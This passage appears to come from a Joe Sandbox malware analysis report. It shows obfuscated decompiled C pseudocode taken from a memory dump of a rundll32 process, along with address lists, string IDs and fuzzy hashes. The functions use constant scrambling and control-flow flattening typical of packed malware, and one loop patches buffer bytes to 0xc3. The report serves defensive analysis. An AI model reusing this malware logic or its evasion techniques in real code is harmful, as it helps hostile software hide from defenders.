                                                                                                                                    				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                                    				_v216 = _v216 ^ 0xf917010b;
                                                                                                                                    				_v200 = 0xc05f9c;
                                                                                                                                    				_v200 = _v200 / _t466;
                                                                                                                                    				_v200 = _v200 * 0x6f;
                                                                                                                                    				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                                    				_v212 = 0xdb89ea;
                                                                                                                                    				_v212 = _v212 >> 0xa;
                                                                                                                                    				_v212 = _v212 >> 9;
                                                                                                                                    				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                                    				_v152 = 0x38fb70;
                                                                                                                                    				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                                    				_v152 = _v152 ^ 0x313af23a;
                                                                                                                                    				_v136 = 0x7e2008;
                                                                                                                                    				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                                    				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                                    				_v196 = 0x9c4278;
                                                                                                                                    				_t467 = 0x4e;
                                                                                                                                    				_v196 = _v196 * 0x7e;
                                                                                                                                    				_v196 = _v196 ^ 0xa26962db;
                                                                                                                                    				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                                    				_v220 = 0x1e88f4;
                                                                                                                                    				_v220 = _v220 >> 4;
                                                                                                                                    				_v220 = _v220 >> 7;
                                                                                                                                    				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                                    				_v140 = 0xc2e6ba;
                                                                                                                                    				_v140 = _v140 + 0x8875;
                                                                                                                                    				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                                    				_v188 = 0xdb74c;
                                                                                                                                    				_v188 = _v188 << 4;
                                                                                                                                    				_v188 = _v188 * 0x5c;
                                                                                                                                    				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                                    				_v236 = 0x62ea5;
                                                                                                                                    				_v236 = _v236 / _t467;
                                                                                                                                    				_v236 = _v236 >> 0xb;
                                                                                                                                    				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                                    				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                                    				_v144 = 0x2b6271;
                                                                                                                                    				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                                    				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                                    				_v224 = 0x8bb898;
                                                                                                                                    				_v224 = _v224 + 0x43a9;
                                                                                                                                    				_v224 = _v224 << 0x10;
                                                                                                                                    				_t468 = 0x71;
                                                                                                                                    				_t469 = _v132;
                                                                                                                                    				_v224 = _v224 / _t468;
                                                                                                                                    				_v224 = _v224 ^ 0x023712cd;
                                                                                                                                    				_v156 = 0xb23c07;
                                                                                                                                    				_v156 = _v156 + 0x4ded;
                                                                                                                                    				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                                    				_v168 = 0xb501ce;
                                                                                                                                    				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                                    				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                                    				_v176 = 0xab8984;
                                                                                                                                    				_v176 = _v176 * 0x22;
                                                                                                                                    				_v176 = _v176 ^ 0x16c84308;
                                                                                                                                    				goto L1;
                                                                                                                                    				do {
                                                                                                                                    					while(1) {
                                                                                                                                    						L1:
                                                                                                                                    						_t474 = _t408 - 0xd9acfaa;
                                                                                                                                    						if(_t474 > 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						if(_t474 == 0) {
                                                                                                                                    							E002D8519(_v236, _v144, _v128);
                                                                                                                                    							_t408 = 0xfbb751f;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t408 == 0x15a913b) {
                                                                                                                                    							_v40 = _t456;
                                                                                                                                    							_v92 =  &_v32;
                                                                                                                                    							_v56 =  *_t455;
                                                                                                                                    							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                                    							_v88 = 0x20;
                                                                                                                                    							_t393 = E002C7735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                                    							_t471 = _t471 + 0x10;
                                                                                                                                    							if(_t393 == 0) {
                                                                                                                                    								L20:
                                                                                                                                    								return _v132;
                                                                                                                                    							}
                                                                                                                                    							_t408 = 0xf0a856e;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t408 == 0x3749e66) {
                                                                                                                                    							_t469 = E002D0AE0(_v176, _v168);
                                                                                                                                    							_t408 = 0x46acfc9;
                                                                                                                                    							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t408 == 0x46acfc9) {
                                                                                                                                    							_push(_t408);
                                                                                                                                    							_push(_t408);
                                                                                                                                    							_t403 = E002C7FF2( *((intOrPtr*)(_t406 + 4)));
                                                                                                                                    							 *_t406 = _t403;
                                                                                                                                    							if(_t403 == 0) {
                                                                                                                                    								_t408 = 0xd9acfaa;
                                                                                                                                    							} else {
                                                                                                                                    								_v132 = 1;
                                                                                                                                    								_t408 = 0xfb3baa2;
                                                                                                                                    							}
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t408 != 0x8e80a37) {
                                                                                                                                    							goto L31;
                                                                                                                                    						}
                                                                                                                                    						_t408 = 0xfac38db;
                                                                                                                                    					}
                                                                                                                                    					if(_t408 == 0xf0a856e) {
                                                                                                                                    						_t377 = E002C70B3(_v164,  &_v128,  &_v120, _v232, _v172);
                                                                                                                                    						_t471 = _t471 + 0xc;
                                                                                                                                    						if(_t377 == 0) {
                                                                                                                                    							_t408 = 0xfbb751f;
                                                                                                                                    							goto L31;
                                                                                                                                    						}
                                                                                                                                    						_t408 = 0x3749e66;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					if(_t408 == 0xfac38db) {
                                                                                                                                    						_push( *_t455);
                                                                                                                                    						_t378 = E002DAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
                                                                                                                                    						_t471 = _t471 + 0x14;
                                                                                                                                    						if(_t378 == 0) {
                                                                                                                                    							goto L20;
                                                                                                                                    						}
                                                                                                                                    						_t408 = 0x15a913b;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					if(_t408 == 0xfb3baa2) {
                                                                                                                                    						_t457 =  *_t406;
                                                                                                                                    						E002C7E87(_v268, _v216, _v200, _t457);
                                                                                                                                    						_t458 = _t457 + _v264;
                                                                                                                                    						E002CED7E(_v212, _t458, _v152, _v128, _v124);
                                                                                                                                    						_t459 = _t458 + _v124;
                                                                                                                                    						E002CA492(_v196, _v220, _t459, _t469);
                                                                                                                                    						_t450 =  &(_t459[_t469]);
                                                                                                                                    						_t471 = _t471 + 0x20;
                                                                                                                                    						_t414 = _t459;
                                                                                                                                    						if(_t459 >= _t450) {
                                                                                                                                    							L25:
                                                                                                                                    							_t386 = E002D0AE0(0xe, 0);
                                                                                                                                    							_t408 = 0xd9acfaa;
                                                                                                                                    							 *((char*)(_t386 + _t459)) = 0;
                                                                                                                                    							_t456 = _a4;
                                                                                                                                    							goto L1;
                                                                                                                                    						} else {
                                                                                                                                    							goto L22;
                                                                                                                                    						}
                                                                                                                                    						do {
                                                                                                                                    							L22:
                                                                                                                                    							if(( *_t414 & 0x000000ff) == _v256) {
                                                                                                                                    								 *_t414 = 0xc3;
                                                                                                                                    							}
                                                                                                                                    							_t414 =  &(_t414[1]);
                                                                                                                                    						} while (_t414 < _t450);
                                                                                                                                    						goto L25;
                                                                                                                                    					}
                                                                                                                                    					if(_t408 != 0xfbb751f) {
                                                                                                                                    						goto L31;
                                                                                                                                    					}
                                                                                                                                    					E002D8519(_v224, _v156, _v120);
                                                                                                                                    					goto L20;
                                                                                                                                    					L31:
                                                                                                                                    				} while (_t408 != 0x5927677);
                                                                                                                                    				goto L20;
                                                                                                                                    			}












































































                                                                                                                                    0x002cd02c
                                                                                                                                    0x002cd034
                                                                                                                                    0x002cd03c
                                                                                                                                    0x002cd044
                                                                                                                                    0x002cd04c
                                                                                                                                    0x002cd054
                                                                                                                                    0x002cd064
                                                                                                                                    0x002cd06c
                                                                                                                                    0x002cd06f
                                                                                                                                    0x002cd073
                                                                                                                                    0x002cd07b
                                                                                                                                    0x002cd083
                                                                                                                                    0x002cd088
                                                                                                                                    0x002cd08d
                                                                                                                                    0x002cd095
                                                                                                                                    0x002cd09d
                                                                                                                                    0x002cd0a5
                                                                                                                                    0x002cd0b2
                                                                                                                                    0x002cd0b6
                                                                                                                                    0x002cd0be
                                                                                                                                    0x002cd0c6
                                                                                                                                    0x002cd0cb
                                                                                                                                    0x002cd0d8
                                                                                                                                    0x002cd0dc
                                                                                                                                    0x002cd0e4
                                                                                                                                    0x002cd0ec
                                                                                                                                    0x002cd0f8
                                                                                                                                    0x002cd0fd
                                                                                                                                    0x002cd103
                                                                                                                                    0x002cd10b
                                                                                                                                    0x002cd116
                                                                                                                                    0x002cd11e
                                                                                                                                    0x002cd129
                                                                                                                                    0x002cd131
                                                                                                                                    0x002cd13e
                                                                                                                                    0x002cd141
                                                                                                                                    0x002cd14a
                                                                                                                                    0x002cd14e
                                                                                                                                    0x002cd156
                                                                                                                                    0x002cd15e
                                                                                                                                    0x002cd163
                                                                                                                                    0x002cd16b
                                                                                                                                    0x002cd17b
                                                                                                                                    0x002cd184
                                                                                                                                    0x002cd187
                                                                                                                                    0x002cd18b
                                                                                                                                    0x002cd193
                                                                                                                                    0x002cd19e
                                                                                                                                    0x002cd1a9
                                                                                                                                    0x002cd1b4
                                                                                                                                    0x002cd1bc
                                                                                                                                    0x002cd1c1
                                                                                                                                    0x002cd1c6
                                                                                                                                    0x002cd1ce
                                                                                                                                    0x002cd1d6
                                                                                                                                    0x002cd1de
                                                                                                                                    0x002cd1e3
                                                                                                                                    0x002cd1e8
                                                                                                                                    0x002cd1f0
                                                                                                                                    0x002cd1f8
                                                                                                                                    0x002cd1fd
                                                                                                                                    0x002cd205
                                                                                                                                    0x002cd209
                                                                                                                                    0x002cd211
                                                                                                                                    0x002cd219
                                                                                                                                    0x002cd226
                                                                                                                                    0x002cd22a
                                                                                                                                    0x002cd232
                                                                                                                                    0x002cd23a
                                                                                                                                    0x002cd247
                                                                                                                                    0x002cd248
                                                                                                                                    0x002cd24c
                                                                                                                                    0x002cd254
                                                                                                                                    0x002cd25c
                                                                                                                                    0x002cd26a
                                                                                                                                    0x002cd273
                                                                                                                                    0x002cd277
                                                                                                                                    0x002cd27f
                                                                                                                                    0x002cd287
                                                                                                                                    0x002cd28c
                                                                                                                                    0x002cd291
                                                                                                                                    0x002cd299
                                                                                                                                    0x002cd2a4
                                                                                                                                    0x002cd2af
                                                                                                                                    0x002cd2ba
                                                                                                                                    0x002cd2c5
                                                                                                                                    0x002cd2d0
                                                                                                                                    0x002cd2db
                                                                                                                                    0x002cd2ec
                                                                                                                                    0x002cd2ef
                                                                                                                                    0x002cd2f3
                                                                                                                                    0x002cd2fb
                                                                                                                                    0x002cd303
                                                                                                                                    0x002cd30b
                                                                                                                                    0x002cd310
                                                                                                                                    0x002cd315
                                                                                                                                    0x002cd31d
                                                                                                                                    0x002cd328
                                                                                                                                    0x002cd333
                                                                                                                                    0x002cd33e
                                                                                                                                    0x002cd346
                                                                                                                                    0x002cd350
                                                                                                                                    0x002cd354
                                                                                                                                    0x002cd35c
                                                                                                                                    0x002cd36c
                                                                                                                                    0x002cd370
                                                                                                                                    0x002cd375
                                                                                                                                    0x002cd37d
                                                                                                                                    0x002cd385
                                                                                                                                    0x002cd390
                                                                                                                                    0x002cd39b
                                                                                                                                    0x002cd3a6
                                                                                                                                    0x002cd3ae
                                                                                                                                    0x002cd3b6
                                                                                                                                    0x002cd3bf
                                                                                                                                    0x002cd3c2
                                                                                                                                    0x002cd3c9
                                                                                                                                    0x002cd3cd
                                                                                                                                    0x002cd3d5
                                                                                                                                    0x002cd3e0
                                                                                                                                    0x002cd3eb
                                                                                                                                    0x002cd3f6
                                                                                                                                    0x002cd3fe
                                                                                                                                    0x002cd406
                                                                                                                                    0x002cd40e
                                                                                                                                    0x002cd41b
                                                                                                                                    0x002cd41f
                                                                                                                                    0x002cd41f
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd42d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd433
                                                                                                                                    0x002cd553
                                                                                                                                    0x002cd559
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd559
                                                                                                                                    0x002cd43f
                                                                                                                                    0x002cd4e3
                                                                                                                                    0x002cd4f6
                                                                                                                                    0x002cd4ff
                                                                                                                                    0x002cd509
                                                                                                                                    0x002cd51f
                                                                                                                                    0x002cd52b
                                                                                                                                    0x002cd530
                                                                                                                                    0x002cd535
                                                                                                                                    0x002cd5a7
                                                                                                                                    0x002cd5b8
                                                                                                                                    0x002cd5b8
                                                                                                                                    0x002cd537
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd537
                                                                                                                                    0x002cd44b
                                                                                                                                    0x002cd4b7
                                                                                                                                    0x002cd4cb
                                                                                                                                    0x002cd4d0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd4d0
                                                                                                                                    0x002cd453
                                                                                                                                    0x002cd477
                                                                                                                                    0x002cd478
                                                                                                                                    0x002cd479
                                                                                                                                    0x002cd47e
                                                                                                                                    0x002cd484
                                                                                                                                    0x002cd498
                                                                                                                                    0x002cd486
                                                                                                                                    0x002cd486
                                                                                                                                    0x002cd491
                                                                                                                                    0x002cd491
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd484
                                                                                                                                    0x002cd45b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd461
                                                                                                                                    0x002cd461
                                                                                                                                    0x002cd569
                                                                                                                                    0x002cd6ac
                                                                                                                                    0x002cd6b1
                                                                                                                                    0x002cd6b6
                                                                                                                                    0x002cd6c2
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd6c2
                                                                                                                                    0x002cd6b8
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd6b8
                                                                                                                                    0x002cd575
                                                                                                                                    0x002cd65b
                                                                                                                                    0x002cd674
                                                                                                                                    0x002cd679
                                                                                                                                    0x002cd67e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                    • API String ID: 0-3591755710
                                                                                                                                    • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                    • Instruction ID: 057d2a9abb39367cef2c0c80d8cfab12bd15267e6502e44b4b58251b45e74e9f
                                                                                                                                    • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                    • Instruction Fuzzy Hash: FC1232715183818FD368CF25C486A5BFBF1FBC4348F608A1DF69A86261D7B19954CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002D907F(intOrPtr* __ecx) {
                                                                                                                                    				intOrPtr* _v4;
                                                                                                                                    				char _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				unsigned int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				void* _t284;
                                                                                                                                    				void* _t285;
                                                                                                                                    				intOrPtr _t286;
                                                                                                                                    				void* _t293;
                                                                                                                                    				void* _t301;
                                                                                                                                    				signed int _t304;
                                                                                                                                    				signed int _t305;
                                                                                                                                    				signed int _t306;
                                                                                                                                    				signed int _t307;
                                                                                                                                    				signed int _t308;
                                                                                                                                    				void* _t311;
                                                                                                                                    				intOrPtr* _t343;
                                                                                                                                    				void* _t347;
                                                                                                                                    				signed int* _t348;
                                                                                                                                    
                                                                                                                                    				_t348 =  &_v132;
                                                                                                                                    				_t343 = __ecx;
                                                                                                                                    				_v4 = __ecx;
                                                                                                                                    				_v40 = 0x7c806d;
                                                                                                                                    				_v40 = _v40 + 0x9e80;
                                                                                                                                    				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                                    				_v12 = 0xea5ac0;
                                                                                                                                    				_v12 = _v12 + 0xffff451e;
                                                                                                                                    				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                                    				_v24 = 0xace3a9;
                                                                                                                                    				_t347 = 0;
                                                                                                                                    				_t304 = 0xa;
                                                                                                                                    				_v24 = _v24 / _t304;
                                                                                                                                    				_v24 = _v24 ^ 0x001149f7;
                                                                                                                                    				_t301 = 0x97dfe60;
                                                                                                                                    				_v112 = 0x63471f;
                                                                                                                                    				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                                    				_v112 = _v112 | 0x0d4cecae;
                                                                                                                                    				_v112 = _v112 << 3;
                                                                                                                                    				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                                    				_v28 = 0x68a2fc;
                                                                                                                                    				_t305 = 0x5b;
                                                                                                                                    				_v28 = _v28 * 0x1c;
                                                                                                                                    				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                                    				_v84 = 0x508d02;
                                                                                                                                    				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                                    				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                                    				_v124 = 0xc0d8a4;
                                                                                                                                    				_v124 = _v124 + 0xffffd7c7;
                                                                                                                                    				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                                    				_v124 = _v124 + 0xffffcd63;
                                                                                                                                    				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                                    				_v116 = 0xc7a01f;
                                                                                                                                    				_v116 = _v116 * 0x50;
                                                                                                                                    				_v116 = _v116 << 7;
                                                                                                                                    				_v116 = _v116 + 0x525d;
                                                                                                                                    				_v116 = _v116 ^ 0x3100192e;
                                                                                                                                    				_v88 = 0x173e76;
                                                                                                                                    				_v88 = _v88 / _t305;
                                                                                                                                    				_v88 = _v88 + 0xcdb8;
                                                                                                                                    				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                                    				_v48 = 0x3a45de;
                                                                                                                                    				_t306 = 0x3d;
                                                                                                                                    				_v48 = _v48 / _t306;
                                                                                                                                    				_v48 = _v48 ^ 0x0006d702;
                                                                                                                                    				_v52 = 0xd8d0f7;
                                                                                                                                    				_v52 = _v52 | 0xabcf1793;
                                                                                                                                    				_v52 = _v52 + 0xffff6a1e;
                                                                                                                                    				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                                    				_v64 = 0xff5420;
                                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                                    				_v64 = _v64 + 0xffff2626;
                                                                                                                                    				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                                    				_v80 = 0x65116e;
                                                                                                                                    				_v80 = _v80 >> 9;
                                                                                                                                    				_v80 = _v80 | 0xde6750c8;
                                                                                                                                    				_v80 = _v80 ^ 0xde6208e1;
                                                                                                                                    				_v56 = 0x2d6903;
                                                                                                                                    				_v56 = _v56 >> 0xc;
                                                                                                                                    				_v56 = _v56 + 0xffff4c70;
                                                                                                                                    				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                                    				_v132 = 0xe5be5a;
                                                                                                                                    				_v132 = _v132 + 0xfffffbec;
                                                                                                                                    				_v132 = _v132 << 3;
                                                                                                                                    				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                                    				_v132 = _v132 ^ 0x418237eb;
                                                                                                                                    				_v108 = 0x3fa801;
                                                                                                                                    				_v108 = _v108 + 0x902;
                                                                                                                                    				_v108 = _v108 >> 7;
                                                                                                                                    				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                                    				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                                    				_v72 = 0x454e35;
                                                                                                                                    				_v72 = _v72 + 0x4c9c;
                                                                                                                                    				_t307 = 0x29;
                                                                                                                                    				_v72 = _v72 / _t307;
                                                                                                                                    				_v72 = _v72 ^ 0x000328df;
                                                                                                                                    				_v32 = 0x46b9f;
                                                                                                                                    				_v32 = _v32 >> 4;
                                                                                                                                    				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                                    				_v16 = 0xab007f;
                                                                                                                                    				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                                    				_v16 = _v16 ^ 0x56002f48;
                                                                                                                                    				_v100 = 0xb9d48c;
                                                                                                                                    				_v100 = _v100 | 0xb434f54e;
                                                                                                                                    				_v100 = _v100 >> 0x10;
                                                                                                                                    				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                                    				_v92 = 0x17070b;
                                                                                                                                    				_t308 = 0x37;
                                                                                                                                    				_v92 = _v92 / _t308;
                                                                                                                                    				_v92 = _v92 << 7;
                                                                                                                                    				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                                    				_v60 = 0xdb418a;
                                                                                                                                    				_v60 = _v60 * 0x4d;
                                                                                                                                    				_v60 = _v60 << 2;
                                                                                                                                    				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                                    				_v68 = 0x99d1b0;
                                                                                                                                    				_v68 = _v68 << 1;
                                                                                                                                    				_v68 = _v68 + 0xadc1;
                                                                                                                                    				_v68 = _v68 ^ 0x01384a96;
                                                                                                                                    				_v120 = 0xfb4a64;
                                                                                                                                    				_v120 = _v120 | 0x92bfeeef;
                                                                                                                                    				_v120 = _v120 + 0x1827;
                                                                                                                                    				_v120 = _v120 >> 5;
                                                                                                                                    				_v120 = _v120 ^ 0x0494323d;
                                                                                                                                    				_v128 = 0xf75f57;
                                                                                                                                    				_v128 = _v128 >> 4;
                                                                                                                                    				_v128 = _v128 + 0xe158;
                                                                                                                                    				_v128 = _v128 + 0xffff16ce;
                                                                                                                                    				_v128 = _v128 ^ 0x000f9950;
                                                                                                                                    				_v76 = 0xb94cf;
                                                                                                                                    				_v76 = _v76 | 0xc911a6ab;
                                                                                                                                    				_v76 = _v76 >> 2;
                                                                                                                                    				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                                    				_v104 = 0x7ca07;
                                                                                                                                    				_v104 = _v104 * 0x23;
                                                                                                                                    				_v104 = _v104 >> 4;
                                                                                                                                    				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                                    				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                                    				_v44 = 0x308a5a;
                                                                                                                                    				_v44 = _v44 >> 0x10;
                                                                                                                                    				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                                    				_v96 = 0x427aa5;
                                                                                                                                    				_v96 = _v96 + 0xed3d;
                                                                                                                                    				_v96 = _v96 + 0xffff13f4;
                                                                                                                                    				_v96 = _v96 ^ 0x0046a078;
                                                                                                                                    				_v20 = 0xf8f4;
                                                                                                                                    				_v20 = _v20 * 0x4a;
                                                                                                                                    				_t284 = 0x4469cd4;
                                                                                                                                    				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                                    				_v36 = 0x7998ac;
                                                                                                                                    				_v36 = _v36 >> 0xc;
                                                                                                                                    				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                                    				do {
                                                                                                                                    					while(_t301 != _t284) {
                                                                                                                                    						if(_t301 == 0x661bd7c) {
                                                                                                                                    							E002C957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                                    						} else {
                                                                                                                                    							if(_t301 == 0x8cd68b1) {
                                                                                                                                    								_push(_v116);
                                                                                                                                    								_push(_v124);
                                                                                                                                    								_t293 = E002DDCF7(_v84, 0x2c1954, __eflags);
                                                                                                                                    								_push(_v52);
                                                                                                                                    								_push(_v48);
                                                                                                                                    								__eflags = E002C9462(_t293, _v80,  &_v8, E002DDCF7(_v88, 0x2c1814, __eflags), _v56, _v40) - _v12;
                                                                                                                                    								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                                    								E002CA8B0(_v132, _t293, _v108);
                                                                                                                                    								E002CA8B0(_v72, _t294, _v32);
                                                                                                                                    								_t343 = _v4;
                                                                                                                                    								L8:
                                                                                                                                    								_t284 = 0x4469cd4;
                                                                                                                                    								_t348 =  &(_t348[0xb]);
                                                                                                                                    								goto L9;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t301 != 0x97dfe60) {
                                                                                                                                    									goto L9;
                                                                                                                                    								} else {
                                                                                                                                    									_t301 = 0x8cd68b1;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L12:
                                                                                                                                    						return _t347;
                                                                                                                                    					}
                                                                                                                                    					_push(_v92);
                                                                                                                                    					_push(_v100);
                                                                                                                                    					_t285 = E002DDCF7(_v16, 0x2c1854, __eflags);
                                                                                                                                    					_pop(_t311);
                                                                                                                                    					_t286 =  *0x2e3dfc; // 0x0
                                                                                                                                    					__eflags = E002CAA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                                    					_t301 = 0x661bd7c;
                                                                                                                                    					_t347 =  ==  ? 1 : _t347;
                                                                                                                                    					E002CA8B0(_v104, _t285, _v44);
                                                                                                                                    					goto L8;
                                                                                                                                    					L9:
                                                                                                                                    					__eflags = _t301 - 0x94c729c;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L12;
                                                                                                                                    			}


















































                                                                                                                                    0x002d95ef
                                                                                                                                    0x002d95f9
                                                                                                                                    0x002d95f9
                                                                                                                                    0x002d953c
                                                                                                                                    0x002d9545
                                                                                                                                    0x002d9550
                                                                                                                                    0x002d9556
                                                                                                                                    0x002d9564
                                                                                                                                    0x002d95a0
                                                                                                                                    0x002d95a2
                                                                                                                                    0x002d95ab
                                                                                                                                    0x002d95b0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d95bd
                                                                                                                                    0x002d95bd
                                                                                                                                    0x002d95bd
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                    • API String ID: 0-668800459
                                                                                                                                    • Opcode ID: 0220e5c308fca51d58f520b74efb20ee20802fcae03370b158f24f8aba46ff2d
                                                                                                                                    • Instruction ID: 2ebf3f27b04049e9337c25bc734bea15c3a37674c8ed173666c07c9cebb586d8
                                                                                                                                    • Opcode Fuzzy Hash: 0220e5c308fca51d58f520b74efb20ee20802fcae03370b158f24f8aba46ff2d
                                                                                                                                    • Instruction Fuzzy Hash: BCD11FB11097808FD369CF25C48A60BBBF1FBC4758F508A1DF1AA86260DBB58959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E0F33() {
                                                                                                                                    				signed int _t237;
                                                                                                                                    				signed char _t246;
                                                                                                                                    				signed short _t255;
                                                                                                                                    				signed int _t262;
                                                                                                                                    				signed char _t269;
                                                                                                                                    				intOrPtr* _t292;
                                                                                                                                    				signed short _t301;
                                                                                                                                    				void* _t302;
                                                                                                                                    				signed short _t306;
                                                                                                                                    				signed int _t309;
                                                                                                                                    				signed int _t310;
                                                                                                                                    				signed int _t311;
                                                                                                                                    				signed int _t312;
                                                                                                                                    				signed int _t313;
                                                                                                                                    				signed int _t314;
                                                                                                                                    				signed int _t315;
                                                                                                                                    				signed short _t319;
                                                                                                                                    				void* _t321;
                                                                                                                                    
                                                                                                                                    				 *(_t321 + 0x20) = 0xee0abc;
